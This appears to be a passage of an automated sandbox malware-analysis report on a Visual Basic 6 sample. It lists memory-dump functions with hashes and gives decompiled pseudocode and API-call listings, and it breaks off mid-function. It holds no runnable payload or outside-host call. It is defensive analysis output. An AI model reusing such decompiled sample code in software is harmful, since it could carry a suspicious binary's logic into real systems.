
Function 021857AE, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 217aad26a47c2555c60208e93652ee39f2283517beb6177779ff4e9460b8a315
Instruction ID: feefa0e8b384d5177ed9575a75dc1921c87790fd67e48cdc6b26aae688a90476
Opcode Fuzzy Hash: 217aad26a47c2555c60208e93652ee39f2283517beb6177779ff4e9460b8a315
Instruction Fuzzy Hash: 0751BA70588342DECB25EF2884D4765BBD3EF12260F97C29ADDA64B2D6D3358446CF12

Uniqueness

Uniqueness Score: -1.00%

Function 021857C9, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 71e2e7848969929edbcc338534c771cda1d2a552adb67196f65029fd4a67e587
Instruction ID: 9eeadac531960f45a1ef494d6e376c107ab97639d55320ea15226b9568acc6d8
Opcode Fuzzy Hash: 71e2e7848969929edbcc338534c771cda1d2a552adb67196f65029fd4a67e587
Instruction Fuzzy Hash: DD51B970588342DECB25EF2884D4765BBD3DF12220F87829ADDA64F2D6D3358446CF12

Uniqueness

Uniqueness Score: -1.00%

Function 021857E7, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: b9a8e3c986c852a121fa625191e65252ebf3019d1bcf446ee2a54d381fbe9f5a
Instruction ID: 5507097b4df01f9489c5f13d8274d45f07ad8a697e5c63cfe5714f35fe4330ad
Opcode Fuzzy Hash: b9a8e3c986c852a121fa625191e65252ebf3019d1bcf446ee2a54d381fbe9f5a
Instruction Fuzzy Hash: 5A51B874588382DECB25EF2884D4765BBD2DF12224F8BC29ADDA64B2D6D3358446CF12

Uniqueness

Uniqueness Score: -1.00%

Function 02181F7A, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 312513bd4462bfa75567abb8d18e5048edae0a3d9935fc33071e2e9970ea4896
Instruction ID: 02f380e8cc6d6ba9be4e21d6674abdfd23cfd5ac882c7967b0b3157e5ed2b0ed
Opcode Fuzzy Hash: 312513bd4462bfa75567abb8d18e5048edae0a3d9935fc33071e2e9970ea4896
Instruction Fuzzy Hash: 2D4121712C4385EFE72A7B248DD8BE47792BF01340F968116ED965B0D6C7B4C88ACE02

Uniqueness

Uniqueness Score: -1.00%

Function 02181D7E, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 852aeabee577172a6f5de7de299508bb8c85497536bd7c50c4127215194ee96f
Instruction ID: 9d3a0b19f4d5b54aee8e8dd368a357cbb9e3c99bb0070feed923991211f8b6b7
Opcode Fuzzy Hash: 852aeabee577172a6f5de7de299508bb8c85497536bd7c50c4127215194ee96f
Instruction Fuzzy Hash: E031F6327C0501AFDB5ABA18CDD4BE57395BF05320F668239ECAED7241DB20D84A8F80

Uniqueness

Uniqueness Score: -1.00%

Function 02181F7D, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148eb7373419407e3b7fe544f17f4036f7c8825db85a5f7b307009d5a5791403
Instruction ID: e3c898541a43149d7ebe4c985b1b8db077e99715c709a564c129f097d42444d5
Opcode Fuzzy Hash: 148eb7373419407e3b7fe544f17f4036f7c8825db85a5f7b307009d5a5791403
Instruction Fuzzy Hash: D43169742C4385EFE72A7B148DD5BF47797AF01300F968156ED864B0C2C775888ACE12

Uniqueness

Uniqueness Score: -1.00%

Function 02181FAF, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f17bdfa8ff80cbed72467902e63a2e23bb1a50c7344856000e96ae89104ad770
Instruction ID: f8f3e80a8140236894708f6f773d9b389250ca86882617000c6dff98da9f49f5
Opcode Fuzzy Hash: f17bdfa8ff80cbed72467902e63a2e23bb1a50c7344856000e96ae89104ad770
Instruction Fuzzy Hash: FA217B742C4389AFE72A7B148DD5BB43B97AF01304F968055EE854B0D2C7B5C889CE12

Uniqueness

Uniqueness Score: -1.00%

Function 02184DA0, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aab0aaace59c67a84e9d054ea89285c267609c06add7070e09bf9aec707be02
Instruction ID: 1c1bc8e0b1af61de3d9c2a7b84d325adbd6e16b55f1548d2e9f9629277d2c542
Opcode Fuzzy Hash: 2aab0aaace59c67a84e9d054ea89285c267609c06add7070e09bf9aec707be02
Instruction Fuzzy Hash: BAF0BE37284202CFCA18EA08C2D0BA3B3A4AF55241F238152EC628B661DB2DDC41CE11

Uniqueness

Uniqueness Score: -1.00%

Function 02184DA3, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0e258607858c955152366d64cad1b42250c3ae0de7079797e1ed05455a5a8dd
Instruction ID: 0667da28540d578ee9ece7416dca725fd185decf2e79f098d05fe92222d4fd41
Opcode Fuzzy Hash: e0e258607858c955152366d64cad1b42250c3ae0de7079797e1ed05455a5a8dd
Instruction Fuzzy Hash: 24F0827A189343CFC709EB18C2C0B67BB98EF46654F164585DDA15B6A2CB29D805CE20

Uniqueness

Uniqueness Score: -1.00%

Function 021846D7, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13516423c51a0251353b6a7df31a474bea87880595370690860e5f09e13a0659
Instruction ID: 197ad304342f3b9ad6478e46096984c4246ba76fc40c05a5e523fb2f0e94f12a
Opcode Fuzzy Hash: 13516423c51a0251353b6a7df31a474bea87880595370690860e5f09e13a0659
Instruction Fuzzy Hash: 8CD0C97811A3D68BCB42C728C2D0B18BFD8FF4A508B0944DDDDC4CBA82C350D418C724

Uniqueness

Uniqueness Score: -1.00%

Function 02182BF7, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 482dcc960ec8ae18b091348e7a725397e0340e8833ccbb8cfdf43ff63a3fc1c7
Instruction ID: 971f2cbb32c8a8c15902bfa5a60abf6707e7e09220fa92afa3f1fc9006aad24c
Opcode Fuzzy Hash: 482dcc960ec8ae18b091348e7a725397e0340e8833ccbb8cfdf43ff63a3fc1c7
Instruction Fuzzy Hash: 59B092F76016809FFF02CE08C481B4073A0FB14A88F0A04E0E402DB711D224FA00CA00

Uniqueness

Uniqueness Score: -1.00%

Function 021846D2, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e0e5e3fcacbfdf4946b328b96bf12f57b6189896d0fa824b1512f42f35dd62c
Instruction ID: d4f185772fe097b3c59be82a706e6f3da5edf32f77ad5cbb7eee898dc93f4812
Opcode Fuzzy Hash: 6e0e5e3fcacbfdf4946b328b96bf12f57b6189896d0fa824b1512f42f35dd62c
Instruction Fuzzy Hash: 03B092382526418FCEA9CA08C1D0E1473E0BB08600B620491E412C7B11C224E800CE00

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA97, Relevance: 30.1, APIs: 20, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0041BA97(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20, void* _a36, void* _a44) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v44;
				void* _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				signed int _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				void* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				signed int _t67;
				short _t71;
				signed int _t77;
				signed int _t83;
				void* _t108;
				void* _t110;
				intOrPtr _t111;

				_t111 = _t110 - 0xc;
				 *[fs:0x0] = _t111;
				L00401420();
				_v16 = _t111;
				_v12 = 0x4012b0;
				_v8 = 0;
				_t67 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t108);
				L00401576();
				L00401582();
				L00401582();
				_push(0x40a354);
				L004014E0();
				L0040156A();
				_push(_t67);
				_push(0x40a35c);
				L0040154C();
				asm("sbb eax, eax");
				_v116 =  ~( ~( ~_t67));
				L00401588();
				_t71 = _v116;
				if(_t71 != 0) {
					if( *0x41fb98 != 0) {
						_v144 = 0x41fb98;
					} else {
						_push(0x41fb98);
						_push(0x40a268);
						L004015B2();
						_v144 = 0x41fb98;
					}
					_v116 =  *_v144;
					_t77 =  *((intOrPtr*)( *_v116 + 0x1c))(_v116,  &_v60);
					asm("fclex");
					_v120 = _t77;
					if(_v120 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40a258);
						_push(_v116);
						_push(_v120);
						L004015AC();
						_v148 = _t77;
					}
					_v124 = _v60;
					_v88 = 0x80020004;
					_v96 = 0xa;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t83 =  *((intOrPtr*)( *_v124 + 0x54))(_v124, 0x10,  &_v64);
					asm("fclex");
					_v128 = _t83;
					if(_v128 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x40a288);
						_push(_v124);
						_push(_v128);
						L004015AC();
						_v152 = _t83;
					}
					_v140 = _v64;
					_v64 = _v64 & 0x00000000;
					_v72 = _v140;
					_v80 = 9;
					_t71 = 0x10;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v52);
					L004014DA();
					L004015A6();
					L00401594();
				}
				_push(0x41bca0);
				L00401588();
				L00401594();
				L00401588();
				L004015A6();
				return _t71;
			}

0x0041ba9a
0x0041baa9
0x0041bab5
0x0041babd
0x0041bac0
0x0041bac7
0x0041bad6
0x0041badf
0x0041baea
0x0041baf5
0x0041bafa
0x0041baff
0x0041bb09
0x0041bb0e
0x0041bb0f
0x0041bb14
0x0041bb1b
0x0041bb21
0x0041bb28
0x0041bb2d
0x0041bb33
0x0041bb40
0x0041bb5d
0x0041bb42
0x0041bb42
0x0041bb47
0x0041bb4c
0x0041bb51
0x0041bb51
0x0041bb6f
0x0041bb7e
0x0041bb81
0x0041bb83
0x0041bb8a
0x0041bba6
0x0041bb8c
0x0041bb8c
0x0041bb8e
0x0041bb93
0x0041bb96
0x0041bb99
0x0041bb9e
0x0041bb9e
0x0041bbb0
0x0041bbb3
0x0041bbba
0x0041bbc8
0x0041bbd2
0x0041bbd3
0x0041bbd4
0x0041bbd5
0x0041bbde
0x0041bbe1
0x0041bbe3
0x0041bbea
0x0041bc06
0x0041bbec
0x0041bbec
0x0041bbee
0x0041bbf3
0x0041bbf6
0x0041bbf9
0x0041bbfe
0x0041bbfe
0x0041bc10
0x0041bc16
0x0041bc20
0x0041bc23
0x0041bc2c
0x0041bc2d
0x0041bc37
0x0041bc38
0x0041bc39
0x0041bc3a
0x0041bc3b
0x0041bc3d
0x0041bc40
0x0041bc48
0x0041bc50
0x0041bc50
0x0041bc55
0x0041bc82
0x0041bc8a
0x0041bc92
0x0041bc9a
0x0041bc9f

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041BAB5
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041BADF
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0041BAEA
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0041BAF5
#527.MSVBVM60(0040A354,?,?,?,?,00401426), ref: 0041BAFF
__vbaStrMove.MSVBVM60(0040A354,?,?,?,?,00401426), ref: 0041BB09
__vbaStrCmp.MSVBVM60(0040A35C,00000000,0040A354,?,?,?,?,00401426), ref: 0041BB14
__vbaFreeStr.MSVBVM60(0040A35C,00000000,0040A354,?,?,?,?,00401426), ref: 0041BB28
__vbaNew2.MSVBVM60(0040A268,0041FB98,0040A35C,00000000,0040A354,?,?,?,?,00401426), ref: 0041BB4C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,0000001C), ref: 0041BB99
__vbaChkstk.MSVBVM60(?), ref: 0041BBC8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A288,00000054), ref: 0041BBF9
__vbaChkstk.MSVBVM60(00000000,?,0040A288,00000054), ref: 0041BC2D
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 0041BC40
__vbaFreeObj.MSVBVM60(?,00000000), ref: 0041BC48
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0041BC50
__vbaFreeStr.MSVBVM60(0041BCA0,0040A35C,00000000,0040A354,?,?,?,?,00401426), ref: 0041BC82
__vbaFreeVar.MSVBVM60(0041BCA0,0040A35C,00000000,0040A354,?,?,?,?,00401426), ref: 0041BC8A
__vbaFreeStr.MSVBVM60(0041BCA0,0040A35C,00000000,0040A354,?,?,?,?,00401426), ref: 0041BC92
__vbaFreeObj.MSVBVM60(0041BCA0,0040A35C,00000000,0040A354,?,?,?,?,00401426), ref: 0041BC9A

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$CheckCopyHresult$#527LateMoveNew2
String ID:
API String ID: 810793502-0
Opcode ID: e87334f243ab7bae1eed7631c2e66bead18abfabfb132eab4be788754246c5d7
Instruction ID: 858b42d67ada52507261b6106e38b66240a9fefbf843149486375e7ad11f31af
Opcode Fuzzy Hash: e87334f243ab7bae1eed7631c2e66bead18abfabfb132eab4be788754246c5d7
Instruction Fuzzy Hash: 9E51DA70D40208EFDB10EFA5C842BDDBBB1BF44744F60416AF405BB2A2DB7859898F95

Uniqueness

Uniqueness Score: -1.00%

Function 0041B565, Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0041B565(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32, void* _a48) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v44;
				char _v60;
				void* _v80;
				char _v84;
				char _v100;
				char* _v124;
				char _v132;
				intOrPtr _v140;
				char _v148;
				void* _v152;
				signed int _v156;
				intOrPtr* _v168;
				signed int _v172;
				short _t54;
				signed int _t55;
				char* _t58;
				char* _t59;
				void* _t77;
				void* _t79;
				intOrPtr _t80;

				_t80 = _t79 - 0xc;
				 *[fs:0x0] = _t80;
				L00401420();
				_v16 = _t80;
				_v12 = 0x401280;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t77);
				L00401576();
				L00401576();
				L00401582();
				_v124 =  &_v44;
				_v132 = 0x4008;
				_push(1);
				_push( &_v132);
				_push( &_v100);
				L004014F8();
				_v140 = 0x40a330;
				_v148 = 0x8008;
				_push( &_v100);
				_t54 =  &_v148;
				_push(_t54);
				L0040155E();
				_v152 = _t54;
				L00401594();
				_t55 = _v152;
				if(_t55 != 0) {
					if( *0x41fb98 != 0) {
						_v168 = 0x41fb98;
					} else {
						_push(0x41fb98);
						_push(0x40a268);
						L004015B2();
						_v168 = 0x41fb98;
					}
					_v152 =  *_v168;
					_t58 =  &_v60;
					L004014EC();
					_t59 =  &_v84;
					L004014F2();
					_t55 =  *((intOrPtr*)( *_v152 + 0x10))(_v152, _t59, _t59, _t58, _t58);
					asm("fclex");
					_v156 = _t55;
					if(_v156 >= 0) {
						_v172 = _v172 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x40a258);
						_push(_v152);
						_push(_v156);
						L004015AC();
						_v172 = _t55;
					}
					L004015A6();
				}
				_push(0x41b70c);
				L00401594();
				L00401588();
				L00401594();
				L00401594();
				return _t55;
			}

0x0041b568
0x0041b577
0x0041b583
0x0041b58b
0x0041b58e
0x0041b595
0x0041b5a4
0x0041b5ad
0x0041b5b8
0x0041b5c5
0x0041b5cd
0x0041b5d0
0x0041b5d7
0x0041b5dc
0x0041b5e0
0x0041b5e1
0x0041b5e6
0x0041b5f0
0x0041b5fd
0x0041b5fe
0x0041b604
0x0041b605
0x0041b60a
0x0041b614
0x0041b619
0x0041b622
0x0041b62f
0x0041b64c
0x0041b631
0x0041b631
0x0041b636
0x0041b63b
0x0041b640
0x0041b640
0x0041b65e
0x0041b664
0x0041b668
0x0041b66e
0x0041b672
0x0041b686
0x0041b689
0x0041b68b
0x0041b698
0x0041b6ba
0x0041b69a
0x0041b69a
0x0041b69c
0x0041b6a1
0x0041b6a7
0x0041b6ad
0x0041b6b2
0x0041b6b2
0x0041b6c4
0x0041b6c4
0x0041b6c9
0x0041b6ee
0x0041b6f6
0x0041b6fe
0x0041b706
0x0041b70b

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041B583
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041B5AD
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041B5B8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0041B5C5
#619.MSVBVM60(?,00004008,00000001), ref: 0041B5E1
__vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000001), ref: 0041B605
__vbaFreeVar.MSVBVM60(?,?,?,00004008,00000001), ref: 0041B614
__vbaNew2.MSVBVM60(0040A268,0041FB98,?,?,?,00004008,00000001), ref: 0041B63B
__vbaObjVar.MSVBVM60(?,?,?,?,?,?,?,?,00004008,00000001), ref: 0041B668
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00004008,00000001), ref: 0041B672
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,00000010,?,?,?,?,?,?,?,00004008,00000001), ref: 0041B6AD
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00004008,00000001), ref: 0041B6C4
__vbaFreeVar.MSVBVM60(0041B70C,?,?,?,00004008,00000001), ref: 0041B6EE
__vbaFreeStr.MSVBVM60(0041B70C,?,?,?,00004008,00000001), ref: 0041B6F6
__vbaFreeVar.MSVBVM60(0041B70C,?,?,?,00004008,00000001), ref: 0041B6FE
__vbaFreeVar.MSVBVM60(0041B70C,?,?,?,00004008,00000001), ref: 0041B706

Strings

ABC, xrefs: 0041B5BD

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#619AddrefCheckChkstkCopyHresultNew2
String ID: ABC
API String ID: 4230451162-2743272264
Opcode ID: b5c69beffd098047ac37b58e7d79fd8ab0871f0910f359ca32a74e0c11fb2912
Instruction ID: 0701f5fc5622b8c4665b64394b52b3a0c0273c98b3a5d1422bc5f457806c1f58
Opcode Fuzzy Hash: b5c69beffd098047ac37b58e7d79fd8ab0871f0910f359ca32a74e0c11fb2912
Instruction Fuzzy Hash: 1841FE70900218AFDB10EFA5CD85BDDB7B4FF54304F5040AAE10ABB1A1DB789A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A88F, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041A88F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v48;
				char _v52;
				char _v56;
				char _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				void* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v124;
				signed int _t59;
				char* _t63;
				signed int _t69;
				void* _t71;
				char* _t72;
				signed int _t75;
				void* _t89;
				void* _t91;
				intOrPtr _t92;

				_t92 = _t91 - 0xc;
				 *[fs:0x0] = _t92;
				L00401420();
				_v16 = _t92;
				_v12 = 0x4011c8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401426, _t89);
				 *_a24 =  *_a24 & 0x00000000;
				_v80 = 0x40a29c;
				_v88 = 8;
				L00401576();
				_t59 =  &_v72;
				_push(_t59);
				L00401546();
				L0040156A();
				_push(_t59);
				_push(0);
				L0040154C();
				asm("sbb eax, eax");
				_v92 =  ~( ~_t59 + 1);
				L00401588();
				L00401594();
				_t63 = _v92;
				if(_t63 != 0) {
					if( *0x41fb98 != 0) {
						_v116 = 0x41fb98;
					} else {
						_push(0x41fb98);
						_push(0x40a268);
						L004015B2();
						_v116 = 0x41fb98;
					}
					_v92 =  *_v116;
					_t69 =  *((intOrPtr*)( *_v92 + 0x1c))(_v92,  &_v52);
					asm("fclex");
					_v96 = _t69;
					if(_v96 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40a258);
						_push(_v92);
						_push(_v96);
						L004015AC();
						_v120 = _t69;
					}
					_v100 = _v52;
					_v80 = 1;
					_v88 = 2;
					_t71 = 0x10;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401552();
					_t72 =  &_v56;
					L004015B8();
					_t75 =  *((intOrPtr*)( *_v100 + 0x58))(_v100, _t72, _t72, _t71, _v28, 0x40a278);
					asm("fclex");
					_v104 = _t75;
					if(_v104 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x40a288);
						_push(_v100);
						_push(_v104);
						L004015AC();
						_v124 = _t75;
					}
					_push( &_v52);
					_t63 =  &_v56;
					_push(_t63);
					_push(2);
					L004015A0();
				}
				_push(0x41aa5a);
				L004015A6();
				return _t63;
			}

0x0041a892
0x0041a8a1
0x0041a8ab
0x0041a8b3
0x0041a8b6
0x0041a8bd
0x0041a8cc
0x0041a8d2
0x0041a8d5
0x0041a8dc
0x0041a8e9
0x0041a8ee
0x0041a8f1
0x0041a8f2
0x0041a8fc
0x0041a901
0x0041a902
0x0041a904
0x0041a90b
0x0041a910
0x0041a917
0x0041a91f
0x0041a924
0x0041a92a
0x0041a937
0x0041a951
0x0041a939
0x0041a939
0x0041a93e
0x0041a943
0x0041a948
0x0041a948
0x0041a95d
0x0041a96c
0x0041a96f
0x0041a971
0x0041a978
0x0041a991
0x0041a97a
0x0041a97a
0x0041a97c
0x0041a981
0x0041a984
0x0041a987
0x0041a98c
0x0041a98c
0x0041a998
0x0041a99b
0x0041a9a2
0x0041a9ab
0x0041a9ac
0x0041a9b6
0x0041a9b7
0x0041a9b8
0x0041a9b9
0x0041a9c2
0x0041a9c8
0x0041a9cc
0x0041a9da
0x0041a9dd
0x0041a9df
0x0041a9e6
0x0041a9ff
0x0041a9e8
0x0041a9e8
0x0041a9ea
0x0041a9ef
0x0041a9f2
0x0041a9f5
0x0041a9fa
0x0041a9fa
0x0041aa06
0x0041aa07
0x0041aa0a
0x0041aa0b
0x0041aa0d
0x0041aa12
0x0041aa15
0x0041aa54
0x0041aa59

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041A8AB
__vbaVarDup.MSVBVM60 ref: 0041A8E9
#667.MSVBVM60(?), ref: 0041A8F2
__vbaStrMove.MSVBVM60(?), ref: 0041A8FC
__vbaStrCmp.MSVBVM60(00000000,00000000,?), ref: 0041A904
__vbaFreeStr.MSVBVM60(00000000,00000000,?), ref: 0041A917
__vbaFreeVar.MSVBVM60(00000000,00000000,?), ref: 0041A91F
__vbaNew2.MSVBVM60(0040A268,0041FB98,00000000,00000000,?), ref: 0041A943
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,0000001C,?,?,?,?,00000000,00000000,?), ref: 0041A987
__vbaChkstk.MSVBVM60(?,?,?,?,00000000,00000000,?), ref: 0041A9AC
__vbaCastObj.MSVBVM60(?,0040A278,?,?,?,?,00000000,00000000,?), ref: 0041A9C2
__vbaObjSet.MSVBVM60(?,00000000,?,0040A278,?,?,?,?,00000000,00000000,?), ref: 0041A9CC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A288,00000058,?,?,?,?,00000000,00000000,?), ref: 0041A9F5
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 0041AA0D
__vbaFreeObj.MSVBVM60(0041AA5A,00000000,00000000,?), ref: 0041AA54

Strings

tmp, xrefs: 0041A8D5

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresult$#667CastListMoveNew2
String ID: tmp
API String ID: 2495860088-753892680
Opcode ID: 1e97d24cba27b6499de5bed7ea53264e6c006004007d398881c6f37760855cd2
Instruction ID: 9dedee92d4f7b09456213e04f9eac3ba539d5e58898fdf27ef11fd493d8597b6
Opcode Fuzzy Hash: 1e97d24cba27b6499de5bed7ea53264e6c006004007d398881c6f37760855cd2
Instruction Fuzzy Hash: 6B412370D40248AFDB00EFA5C946BDDBBB4BF04704F60412AF002BB2A1D7789999CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C6FC, Relevance: 25.7, APIs: 17, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041C6FC(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int _v56;
				signed int _v60;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				signed long long _v88;
				char _v92;
				intOrPtr _v96;
				signed int _v100;
				void* _t80;
				char* _t81;
				signed int _t85;
				char* _t89;
				char* _t93;
				signed int _t97;
				char* _t101;
				signed int _t105;
				signed int _t108;
				intOrPtr _t120;
				void* _t124;
				intOrPtr* _t126;
				signed long long _t139;
				intOrPtr _t143;
				intOrPtr _t144;

				 *[fs:0x0] = _t126;
				_t80 = 0x50;
				L00401420();
				_v12 = _t126;
				_v8 = 0x401388;
				L00401582();
				L004014FE();
				_t81 =  &_v28;
				L004015B8();
				_v44 = _t81;
				_t85 =  *((intOrPtr*)( *_v44 + 0x1c))(_v44,  &_v36, _t81, _t80, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, __ecx, __ecx, _t124);
				asm("fclex");
				_v48 = _t85;
				if(_v48 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x40a300);
					_push(_v44);
					_push(_v48);
					L004015AC();
					_v68 = _t85;
				}
				_v52 =  ~(0 | _v36 != 0x00000000);
				L004015A6();
				_t89 = _v52;
				if(_t89 != 0) {
					if( *0x41e010 != 0) {
						_v72 = 0x41e010;
					} else {
						_push(0x41e010);
						_push(0x407448);
						L004015B2();
